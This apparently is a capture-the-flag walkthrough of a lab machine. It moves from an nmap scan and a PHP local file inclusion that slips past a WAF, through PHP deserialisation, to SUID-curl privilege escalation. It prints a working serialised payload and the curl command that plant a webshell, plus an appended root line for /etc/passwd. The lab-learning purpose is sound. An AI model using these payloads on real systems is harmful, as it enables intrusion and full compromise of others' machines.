Gaining Access
Nmap scan:
Copy $ nmap -p- --min-rate 3000 192.168.183.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-11 23:05 +08
Nmap scan report for 192.168.183.173
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy Web Enum -> PHP LFI
Port 80 shows a simple quiz application:
If we click any of the buttons, we are shown a very obvious LFI.
Attempting to do anything with it results in being blocked by a WAF.
We can confirm that the website runs on PHP by visiting index.php and being shown the same page. Then, I experimented with some PHP Filter LFI exploits for the blackdeath page.
The WAF is easily bypassed as long as we include it within the page parameter. We can read the code of index.php by visiting:
Copy http://192.168.183.173/index.php?page=php://filter/convert.base64-encode/resource=blackdeath/../../../../../var/www/html/index Here's the PHP code:
Copy <? php
function containsStr ($str , $substr) {
return strpos ( $str , $substr ) !== false ;
}
$extension = '.php' ;
if ( isset ( $_GET[ 'page' ] ) ) {
if ( containsStr ( $_GET[ 'page' ] , 'blackdeath' ) || containsStr ( $_GET[ 'page' ] , 'coronavirus' ) ) {
include $_GET[ 'page' ] . $extension;
} else {
echo 'Tampering Detected!' ;
}
}
?> Source Code Review -> Deserialisation
We can read the index.php file of the nginx configuration here:
Copy http://192.168.183.173/index.php?page=php://filter/convert.base64-encode/resource=blackdeath/../../../../../../usr/share/nginx/html/index Here's the PHP code:
Copy <? php
class MyClass {
public $form_file = 'msgwithres.txt' ;
public $msgo = '' ;
public function Savemsgo () {
$researcher_name = $_GET[ 'name' ];
$researcher_email = $_GET[ 'email' ];
$respo = $_GET[ 'comments' ];
$this-> msgo = "msgo: " . $researcher_name . " || Email : " . $researcher_email . " || Comment: " . $respo . "\n";
}
public function __destruct () {
file_put_contents ( __DIR__ . '/' . $this -> form_file , $this -> msgo , FILE_APPEND ) ;
echo 'Saved! :)' ;
}
}
$values_submit = $_GET[ 'values_submit' ] ?? '' ;
$msgovalues_submit = unserialize ( $values_submit ) ;
$webApp = new MyClass ;
$webApp -> Savemsgo () ;
?> This PHP runs for the service on port 8080. The vulnerability here is the fact that the website deserialises the output we generate.
We can then submit a GET requests with this payload:
Copy O: 7 : "MyClass" : 2 :{s: 9 : "form_file" ;s: 8 : "test.php" ;s: 4 : "msgo" ;s: 29 : "<?php+system($_GET['cmd']);?>" ;} This would output a webshell on the machine for us to execute commands from. To submit it, we can just use this curl command:
Copy $ curl "http://192.168.183.173:8080/index.php?values_submit=O:7:%22MyClass%22:2:%7Bs:9:%22form_file%22;s:8:%22test.php%22;s:4:%22msgo%22;s:29:%22%3C?php+system(\$_GET%5B'cmd'%5D);?%3E%22;%7D" Then, we can verify that we have RCE:
Getting reverse shell using the usual bash one-liner is easy:
Privilege Escalation
Curl SUID -> Overwrite /etc/passwd
I searched for SUID binaries, and found that curl was one of them:
Copy www-data@injectocurly:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/curl This means we can overwrite any file. To get a root shell, we can overwrite the /etc/passwd file. First, generate a valid hash:
Copy $ openssl passwd -1 hello
$1$wsCz0GNf$0S8e55RreE.iCJIyEr3jP. Afterwards, just copy the /etc/passwd file and append this line:
Copy hacker:$1$wsCz0GNf$0S8e55RreE.iCJIyEr3jP.:0:0::/root:/bin/sh Then, host the new passwd file on a HTTP server and curl it, directing the output to /etc/passwd. Afterwards, su to the new user to get root:
Rooted!
Last updated 6 months ago
